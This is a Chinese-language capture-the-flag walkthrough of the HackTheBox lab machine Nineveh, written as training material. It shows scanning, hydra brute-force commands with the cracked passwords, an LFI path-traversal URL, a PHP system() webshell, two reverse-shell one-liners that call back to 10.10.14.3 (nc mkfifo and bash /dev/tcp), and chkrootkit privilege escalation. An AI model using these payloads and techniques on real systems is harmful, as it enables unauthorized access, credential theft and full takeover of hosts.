Nineveh - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/54

• 10.10.10.43

端口扫描

80和443:

$ nmap -sC -sV 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 13:41 CST
Nmap scan report for 10.10.10.43
Host is up (0.071s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.95 seconds

80

apache默认页面：

443

一张图

目录扫描

80

80发现个department目录需要登录，info.php就是phpinfp：

➜  ~ gobuster dir -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt -t 50

/index.html (Status: 200)
/info.php (Status: 200)
/department (Status: 301)
/server-status (Status: 403)

443

443发现db，secure_notes等目录：

gobuster dir -u https://10.10.10.43/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt -t 50

/index.html (Status: 200)
/db (Status: 301)
/server-status (Status: 403)
/secure_notes (Status: 301)

phpLiteAdmin

db是phpLiteAdmin v1.9：

可以搜到相关漏洞：

• PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit
  https://www.exploit-db.com/exploits/24044

但前提是需要登录

secure_notes

secure_notes里是一张很大的图：

直接查看strings的话能够发现里面藏了很多东西，包括ssh私钥，但当前并没有对外开放ssh端口,可以先保存下来：

密码爆破

可以爆破PHPLiteAdmin和department的密码：

hydra -l none -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V
[443][http-post-form] host: 10.10.10.43   login: none   password: password123

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 -V
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t

LFI

department那里notes是有lfi，多次尝试发现文件名必须有ninevehNotes.txt才能包含：

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt*/../../../../../../etc/passwd

webshell

我们前面还有个phpLiteAdmin，这个是可以写php文件的，就是数据库表名用php代码，然后重命名数据库, 之后LFI：

<?php system($_REQUEST["miao"]);?>

/var/tmp/ninevehNotes.txt.php

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&miao=whoami

reverse shell

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&miao=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.3%204444%20%3E/tmp/f

knock

查看进程能够发现一个knockd：

搜索资料发现是用于隐藏ssh的，需要敲门才能够ssh：

• linux安全配置-将ssh服务隐藏于Internet（端口碰撞） - bask! - 博客园
  https://www.cnblogs.com/bask/p/9159197.html

所以可以直接去查看配置文件，得到敲门序列：

$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn
$ ls /home
amrois

knock & ssh & user flag

sudo apt-get install knockd
knock 10.10.10.43 571 290 911
# 也可以nmap来进行
for x in 571 290 911; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.43; done

chmod 600 nineveh.priv
ssh -i nineveh.priv amrois@10.10.10.43

chkrootkit

如果运行pspy之类的可以发现/usr/bin/chkrootkit定时运行，而chkrootkit存在已知的本地提权漏洞：

• Chkrootkit 0.49 - Local Privilege Escalation - Linux local Exploit
  https://www.exploit-db.com/exploits/33899

提权 & root flag

就是在tmp下写一个update文件，等待触发

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.3/4445 0>&1

参考资料

• PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit
  https://www.exploit-db.com/exploits/24044
• linux安全配置-将ssh服务隐藏于Internet（端口碰撞） - bask! - 博客园
  https://www.cnblogs.com/bask/p/9159197.html
• Chkrootkit 0.49 - Local Privilege Escalation - Linux local Exploit
  https://www.exploit-db.com/exploits/33899
• HTB: Nineveh | 0xdf hacks stuff
  https://0xdf.gitlab.io/2020/04/22/htb-nineveh.html
• https://www.hackthebox.eu/home/machines/writeup/54
• HackTheBox - Nineveh - YouTube
  https://www.youtube.com/watch?v=K9DKULxSBK4&ab_channel=IppSec